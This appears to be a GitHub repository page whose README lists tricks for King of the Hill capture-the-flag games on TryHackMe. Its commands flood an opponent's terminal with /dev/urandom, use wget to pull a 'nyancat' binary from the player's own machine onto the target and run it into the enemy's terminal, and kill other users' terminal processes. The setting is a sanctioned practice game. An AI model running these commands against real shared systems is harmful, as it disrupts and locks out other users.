Skip to content

sakshm-aurora/koth_tricks

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

koth_tricks

Killing pts

  1. Breaking pts by spamming urandom on thier terminal
    | cat /dev/urandom > /dev/pts/$PTS

  2. NyanCat

    | sudo python3 -m http.server 80 # On your local machine
    | wget http://yourip/nyancat # On the KOTH machine
    | chmod +x nyancat
    | ./nyancat > /dev/$pts #replace $pts with pts of enemy

  3. Kill pts
    | ps aux | grep pts

    Then, look for a pts that is not yours and kill its process.

    | kill -9 $PID #pid should be of a processs of enemy's pts

About

tricks and tips i use in king of the hill ctf's on tryhackme

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published